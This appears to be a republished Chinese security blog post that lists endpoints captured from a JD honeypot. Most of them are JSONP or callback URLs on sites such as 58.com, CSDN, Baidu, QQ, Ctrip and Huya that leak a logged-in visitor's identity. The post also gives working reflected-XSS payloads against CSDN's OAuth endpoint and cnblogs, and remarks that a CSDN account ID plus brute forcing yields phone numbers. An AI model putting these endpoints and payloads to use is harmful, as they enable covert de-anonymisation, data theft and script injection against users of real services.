蜜罐接口抓取分享
2022-7-15 09:3:4 Author: 潇湘信安(查看原文) 阅读量:23 收藏

水篇文章吧,分享一些接口玩!!!

渗透需小心,不然蜜罐麻麻的!!!

0x01 前言

事情是这样的,和以前一样正常打开土司逛论坛,发觉到一篇关于踩了京东蜜罐的文章。

就跟着这个师傅的文章泄露的关键点:某物流-物控平台-登录,结合起来去fofa搜下就能找到了

然后淡定的打开隐私模式进行访问这个,进行踩蜜罐抓一波接口,还是逮到蛮多接口的。

踩到这个蜜罐的话确实直接一波溯源铁铁的,地域+id+在结合某些博客以及这些平台的找回密码即可精准溯源,原理也是蛮常规的jsonp或者反射xss去获取数据

把相关接口分享给大家吧,还有两个某厂商的xss笑死

0x02 接口

① 58同城

https://employer.58.com/index/enterpriseinfo?&xxoo=chrome-extension://&&callback=jQuery152018637907672647902_1657807551290&_=1657807551747

② 城通网盘

https://home.ctfile.com/iajax.php?item=profile&xxoo=chrome-extension://&action=index&jsonp=jQuery2398423949823

③ 51cto

https://home.51cto.com/index.php?s=/Index/getLoginStatus2015/reback/http%253A%252F%252Fwww.51cto.com%252F&xxoo=chrome-extension://

④ 记录ip的以及归属地的接口

https://ipip.iask.cn/iplookup/search

⑤ 微博

不过没啥东西

https://login.sina.com.cn/sso/prelogin.php?entry=weibo&su=&rsakt=mod&client=ssologin.js(v1.4.19)&&callback=%3C%3E

⑥ 京东

看了下没啥特别好的东西

https://api.m.jd.com/client.action?functionId=getBabelProductPaged&xxoo=chrome-extension://&body=%7b%22%73%65%63%6f%6e%64%54%61%62%49%64%22%3a%22%30%30%31%35%35%35%35%34%37%30%38%39%33%5f%30%33%37%32%36%36%30%30%5f%22%2c%22%74%79%70%65%22%3a%22%30%22%2c%22%70%61%67%65%4e%75%6d%22%3a%22%31%22%2c%22%6d%69%74%65%6d%41%64%64%72%49%64%22%3a%22%22%2c%22%67%65%6f%22%3a%7b%22%6c%6e%67%22%3a%22%22%2c%22%6c%61%74%22%3a%22%22%7d%2c%22%61%64%64%72%65%73%73%49%64%22%3a%22%22%2c%22%70%6f%73%4c%6e%67%22%3a%22%22%2c%22%70%6f%73%4c%61%74%22%3a%22%22%2c%22%66%6f%63%75%73%22%3a%22%22%2c%22%69%6e%6e%65%72%41%6e%63%68%6f%72%22%3a%22%22%7d&screen=2799*1208&client=wh5&clientVersion=1.0.0&sid=&uuid=&area=&_=1585823068850&callback=jsonp1

⑦ 爱问

https://m.iask.sina.com.cn/cas/logins?domain=iask.sina.com.cn&xxoo=chrome-extension://&businessSys=iask&channel=null&popup=show&clsId=undefined&fid=1

⑧ 百度

我登录了百度账户下也没啥东西

https://p.qiao.baidu.com/cps5/chat/push?sid=-100&tid=-1&reason=&tid_authtype=-1&sign=&dev=0&isAFF=1&filterAdvertisement=1&AFDto=20%24548016578075084359962974541416578075084365914&AFDvw=021170454800000000000000000000000000000000000000000000008401ff8003745DDCC06B939A948AEA7288C5FD1690A%3AFG%3D10000000000000&type=2&v=165780749780958748&s=13768072&e=28181423&auth=%7B%22anonym%22%3A0%2C%22key%22%3A%22%22%2C%22sn%22%3A%22%22%2C%22id%22%3A%22165780749780958748%22%2C%22from%22%3A4%2C%22token%22%3A%22bridge%22%7D&key=%257B%2522anonym%2522%253A0%252C%2522key%2522%253A%2522%2522%252C%2522sn%2522%253A%2522%2522%252C%2522id%2522%253A%2522165780749780958748%2522%252C%2522from%2522%253A4%252C%2522token%2522%253A%2522bridge%2522%257D&v=1657807497809587484

⑨ 苏宁

没这个的账户就没测了

https://myjr.suning.com/sfp/mutualTrust/getLoginInfo.htm?xxoo=chrome-extension://&&callback=jQuery172011468305000873791_1608255922695&_=1657807551743

⑩ csdn

https://api.csdn.net/oauth/authorize?client_id=1000001&xxoo=chrome-extension://&redirect_uri=http://www.iteye.com/auth/csdn/callback&response_type=%22https%3A%2F%2Fapi.csdn.net%2Foauth%2Fauthorize%3Fclient_id%3D1000001%26redirect_uri%3D%22http%3A%2F%2Fwww.iteye.com%2Fauth%2Fcsdn%2Fcallback%26response_type%3D%22%3E%3Cimg%20src%3Dx%20onerror%3Deval(window.name)%3E%E3%80%81

果然还是这个接口,抓住账户id+爆破就可以得手机号了

https://api.csdn.net/oauth/authorize?client_id=1000001&xxoo=chrome-extension://&redirect_uri=http://www.iteye.com/auth/csdn/callback&response_type="https://api.csdn.net/oauth/authorize?client_id=1000001&redirect_uri="http://www.iteye.com/auth/csdn/callback&response_type="><img src=x onerror=alert(1)>

利用这个反射xss引入xss来利用的看了下思路就是

11 超星的

POST /getauthstatus HTTP/1.1Host: passport2.chaoxing.com
enc=80a46477866993d3599b7f39506f8ece&uuid=ddbc623b7fc14a07b4b6c8cae881f51c

12 QQ

没啥东西

https://u.y.qq.com/cgi-bin/musicu.fcg?data=%7B%22HG%22%3A%7B%22module%22%3A%22Base.VideoFeedsUrlServer%22%2C%22method%22%3A%22GetVideoFeedsUrl%22%2C%22param%22%3A%7B%22fileid%22%3A%220_11_013ee9171515dd784f7988b354084cf1a294299e.zip%22%7D%7D%2C%22DB%22%3A%7B%22module%22%3A%22ScoreCenter.ScoreCenterEx%22%2C%22method%22%3A%22free_login%22%2C%22param%22%3A%7B%22test%22%3A0%2C%22redirect%22%3A%22https%3A%2F%2Factivity.m.duiba.com.cn%2Fsubpage%2Findex%3FskinId%3D1049%22%2C%22activeId%22%3A0%2C%22activeType%22%3A%22%22%7D%7D%2C%22A%22%3A%7B%22module%22%3A%22CDN.SrfCdnDispatchServer%22%2C%22method%22%3A%22GetCdnDispatch%22%2C%22param%22%3A%7B%22guid%22%3A%22MS%22%7D%7D%2C%22B%22%3A%7B%22module%22%3A%22VipActivity.AwardPay%22%2C%22method%22%3A%22GetPayRank%22%2C%22param%22%3A%7B%22actid%22%3A%22D8D2CAAC126AE8FB%22%2C%22pagesize%22%3A0%7D%7D%2C%22C%22%3A%7B%22module%22%3A%22login.BasicinfoServer%22%2C%22method%22%3A%22CallBasicInfo%22%2C%22param%22%3A%7B%7D%7D%7D&callback=%3Cimg%20src=1%20oneror=alert(1)%3E

13 虎牙

登录后我没看到啥东西

https://www.huya.com/udb_web/udbport2.php?m=HuyaLogin&xxoo=chrome-extension://&do=checkLogin&callback=jQuery22407402084422104858_1604891765254&callback=jQuery152018637907672647902_1657807551285&_=1657807551739

14 博客园

且可反射xss,这个需要登录账户后

https://wz.cnblogs.com/create?t=xxxx&xxoo=chrome-extension://&&u=%22%3E%3Csvg/onload=alert(%221%22)%3E&c=&i=0

15 百度

这个还行,可以获取sign和userflag和uname以及图片

https://yuedu.baidu.com/nauser/getyduserinfo?na_uncheck=1&opid=wk_na&xxoo=chrome-extension://&&callback=1

16 百度的接口

看了下没啥东西

post包https://sfp.safe.baidu.com/sfp/v1/rd
CODED--v20ezK)MoupU]_3Z)uC^)c*`X_Ga172rO8BM)KlPHO<QsytYw_x\T[9b<_Ma2K?/[email protected]:,QLrcmdCzrDv;]ZKla][email protected]_VIGfsfo_7W0L?Zw_FYY\Ec-[<[email protected]`gZXPuf,>.UMO0YQS4]dTZum`1r4SOhEcDMj6zMn+pUs[t[vWx\T[CaX_Ma1[2h`gOMjK9MoG.U]O>[email protected]^Uy8aYW<e][@ia_DMECzQIG,UMK0YQO4]US8aYW<e][@ia_DMECzQIG,UMK0YQO4_Uc8alp2g][@iE/GN1W3R-_.Y1XPZwrS^9gHfYd\gncMjrwFNEjHQp_7U1zR^5>5]US8aYW<e][@ia_DMDKvMoW/QsytYaWx\T[CbX_Ma1_>i5s6LDK3SHO=Qtnwe?03\U[8aiW<em[Ah`[email protected];9e\,za\0Zfe`7iCX8nh<oypNCi4CGNzylPHO8U\SAUvW0Y)g:]-3.ea/@e4C6dH:lSnO.UL[<ZQu4]ekDb=+<[email protected]<V1[<ZQS?]ekDb=+<g]gNja3FNUW)RoqpTLTsoPWEY)gCcYW.d\d1u4gUIjL<

POST /abot/api/v1/tpl/commit HTTP/1.1Host: sofire.baidu.com
CODED--v20ezLvhHO=QsO=ZaqC]UuDbioJfAg2h`h7dDK9MoK9V][email protected]^ekFb=c.d\dLe5;6aIT3gMS=T0C0X)T-ihJ6m0\5rao>uOWAL3Pzg-S+a;rspRz2jXhG],;.r\cQ/DgDIkqlVHOzQsOt[vW5^e_EyY+If\c<e5g6OjK)RYS9mMq1ZvW0Y)_*c,`My\K_p4DUaDz9eH7\^00AmP?Xc88-v,[email protected]@5,[email protected]_i`>3YvW0Y)g*c,_9f]/@e4C6NjK9MoGpTLS>Uw+xu,y5eEJ.d\cOe5;6MTKvMoqpWrS2ZPW0Y)W8]-3.m^lbecx=ZYfogn,KiQT/ndcveVdZ][p5rq,5-4DcaILyf\r8j\L\^Rgvf,,-xGl>d^K9uPhCc3;phHHMbPnwUSPTbzTjullJrqc<rOt6S3n3MLP8i`0;Xdz2YWTXf,_8a1_Ae5;6MTKvMoK.QsytYPW0Y)W;]-3.e\c<e5cOIkqlQXOzQsO<Uw+x]d[4]-[[email protected]\`CAmd40idJD`-W,c_,9,8pCd4OjXqWnU]K.YQ/vfC,6b-gNaa/Mja?4co[9QYG.TsK)URr)iC47`=_<em[@iq_EIF\sgr\tj<q/YaO6\)S*`X_=g\cQe84OdID+Sn>+kL?1mdT3\,\)ulhHd4h?,pW7cIO+P7Tvaa\Unz`)uT[4]-[La172e4C6MkGlSoK8V1[,UwW6Y)/*b=l0rpkMktoRZUOz]-[7WMq<YzX)^e\)clkKf4d1i57RM)i5RY`pUrS,UwW?Y)/*],;.e1o2k4g6LDK*RnO=QrS,UwWBY)/*aX_8a1cOe5;6dX7ufr?:jrS,UwWDY)/*xlK7z4SN,[email protected]`?+nzGBrz[4]-c=a172uu`DbHnm]]Xwj;>/oT`*\WTXf,XnyppNvuhWdHX7hH?,bPc,aR`VYWl1nmz1)5?2h`gGMjK9MsTojwW-o?d6qhk*`[email protected]@qSrfYezjgnp4aSt0og24-k6X_8a1gKe5;6OEO)SLO;V1dxewc6]Cc;bYp2rpt6jakRNXPpQY_,bPO0Zd[CjUT+mh_8a1gLe5;6R3;y^7,sQNv.e4Bv[VXafX/8inOcpbs4KFHQVH+n]vPvfdG2YVzX]Yc>e][0nPh5cHjs]8SnZPv2fd\?]Ac9ahXI)JRLtE_4cIPiR[>,S\S,Uw[CY)/*j0l>r``>upC4VHnw^]SpTLS;YPWEY)S*`[email protected]*MoupUMS1Yaq4^UgCcYW<e][@ia_DMECzQIG,UMK0YQO4]US8aYW<e][@ia_DMECzQIG,UMK0YQO4]USGbYW=r4sOia_GN)O6VYW:VsTOY=_A^A_Fbi0\eIkPm5wPRkK3SJW.Zs[3[xhW`eW8aYW<e][@ia_DMECzMn+pVMWt[vW5]z[4][email protected]^[email protected]`[email protected]/0Uv3x^Uu*c,_=d]_<[email protected];`um?F0])S9aYW=e]_<h`Dmb4rsfL,oTN?wpU\yiiT-`[z5z1gBhakRLDKvMo[,QsytoPC5qhX7`0`-yplLh8lCbTKvMo[-QsytUv3x^e[*c,_?e]\OiqsDIjylRYWpWrS0Uv3x^eg*c,_<d][<i`[email protected],UwcBY)/*ah;<d][<i`CDLEClPHO8WLSAUv3x\T[EaX_Ma1[2h`gQMTK9MoGpTLS=YvWEY)S*`[email protected]_6LDK5RXO=QsKtXPWB]T[I]-_<em/Aia_EMECzQIG,Qr/tZ5Sx_z[9`YW8e\[email protected][email protected]+pV1[t[zhwrY`-`[email protected]*b=y.g4t1,el9LDK6SHO=bvP,o?c0Y)uH][email protected]`ojQXwXPWC]d[In0\8)Ko<e53FIkrp]\,/b\/t[Q[x_,l)v]d1d\cOj4gUIkClPHO;V0SAfzT0sCg4]-k>elcQe70=bnTyh8Sn\u[rYaO2]U3zjG0:f1kRee3QNDKvMo[7U\SAUzC3tTT)x0\5z``2,ds6LDLpQ,O=Qs_.YPO,fC,6n\OJ)@32h`h:NjK9hMP8b\/tewT6Y)/*],;.q1`Ce5;6Ijyl]oLqQsy0XPXx]ic*c-W8a4cA+`gUMDyl]oLtQsy0XPXx]h[*c-W8a4cA-8s6OkCvMoO7a\SAYP3x])d*]-3.a0?2i5p7IkqzPHO.VP[t[wO0Y)[Cnh_Me\?2i5p:IkqzPHO.VPmt[wO0Y)[CuX_Me\?2i5p=IkqlMn+pUs\*Uw+xYz7*a-h>rqg2k4hDcnXL]\;rjP_tXPW6^YS*c,_.d\dK-Ec6OkG5RYi;UMm<Zaq6^US4]1h?e0cQiqwPN)izR-[8WMW;Zv3xtY_;]-3<d\dK-Eo6OkG5RYi;UMm<Zau7^Uu4]1h?f0cQiqwPN)izR-[8V1S;YP3xtY_F]-3<d\dK-E36OkCvMsX/W\[email protected]^9y8b=kHg]gKjDC6eoOlSnO,Qr/tq)[4Y)/*cX_8a4`;e5;6Ijylhr\.QsytUv3xiD_*c,_=a0?2uu_6OjK4RIm,Qr/tpzcx_z[;`-W:ems2h`hFbjK9MoGpTLT3p4WEY)S*`X`?*L72k4gDIo2vMrLyQsytZa_C]T[4]0_.g0cPkaoOZki)^YK7UMrxZzdyi)+;a-[?fKkCiOh9ZEfm^rXqbs_1[TS7])_CaYc?f13BkaoENkW6Mn+plQKt[vXxqXc*`X`4a172/NC6bUHfMovi`\0nUz>6hT[IkFF8p\d=iNC6OmvgPK+pj]\nUw,qhd8v]0FHp\[email protected]+pWu,oXS3xrevv][email protected],e8NSXDK9[66z`LT-[c3x_+4w`[;[email protected]`gUW22v\HP)U]PnUw,qhiB*`X`.ylcQe5kRRUS6RoPKU9[=Z=[B^e,XaEgLi1sLn5gOOFS*VoW/WtdS\aSx\T\;]-3.l]dnna`EbkDWZZ7UQr/[email protected]_x_z\/_HpnzIhNsdxCUIXd[JvLk<XMb>[email protected],^yk`;ga0PgMdecFf4U\+-VaPP`ydccXClj]X]e]0;-qxccXTyio`QmPXPm)zUe-S9gih4f4dbpqxrZX\NgL\Q]<zyoy\[email protected]\om]PWo?r,tX03b\p3*[email protected]+hMPpjNTenQ\1uh\UajN?*L7Nj7lCcGq7Z6r^ZwXeb>rccfz:e0\a+n`LjE4laFe4SMT;mLB+])XCb)hfw=XY+1t5gMdjeWjR[H?QZ:`xZbz2[D\gym+Hk3\:na0OQorOZp;omuPP]zT4rTK[jml^*p;BpdwGRFnTYLTql]K;ayT^j,[;u-Xjo1\rje7OWl\dWZX=Y^,be=dQjXcHalz9o^,`v7gSQX\*^MLW][email protected]:kqlbdXG*f]HTWQvx_U`)j)_7`GlxzIk;rs8mdHi7f8T=\OXw[Rz[d,44giWP,_\cja`vbo\qgY`+j9S0bSPwcf+Db\zlnA\Nm4VFUXvv^r;wb`;]n?d3g,uLzY[<,``3utwRYUnpQrW/WMS3Ya_CjU+Gb-,-r`d6ja46ZkS3Mn+pa0SAUvW0Y,W*c,_.d\d1+to6OjK4RIm,Qr/tezzEY)0J]0lIa172-dd;ZW;ofsXskrS,Uz\@sDd7vll>a172hqc6LDLle\WpWrS1ZwcB_USFbY/Jg][Pjq3RNEilPHPzb`?ypTux_)TL`X`Ia172iDRDLkG5Mn+pla[t[vWxvbOP
https://easylearn.baidu.com/edu-web/activity/extracheck?courseId=1&xxoo=chrome-extension://&type=1&&callback=jQuery152018637907672647902_1657807551287&_=1657807551744

17 携程

https://accounts.ctrip.com/ssoproxy/ssoGetUserInfo?xxoo=chrome-extension://&jsonp=%3C%22?&callback=11111

18 直播吧

没这个的账户

https://bbs.zhibo8.cc/user/userinfo?device=pc&xxoo=chrome-extension://&_=1657807551741&callback=%3C1

关 注 有 礼

关注公众号回复“9527”可以领取一套HTB靶场文档和视频1208”个人常用高效爆破字典0221”2020年酒仙桥文章打包2191潇湘信安文章打包,“1212”杀软对比源码+数据源,0421Windows提权工具包

 还在等什么?赶紧点击下方名片关注学习吧!


推 荐 阅 读



文章来源: http://mp.weixin.qq.com/s?__biz=Mzg4NTUwMzM1Ng==&mid=2247496914&idx=2&sn=8dad8ddec19c9797593ff228acadab97&chksm=cfa550c1f8d2d9d70d466dca26a2aa7bbebb4e975f676b894ffa59f228337dbf03e22b6f70d9#rd
如有侵权请联系:admin#unsafe.sh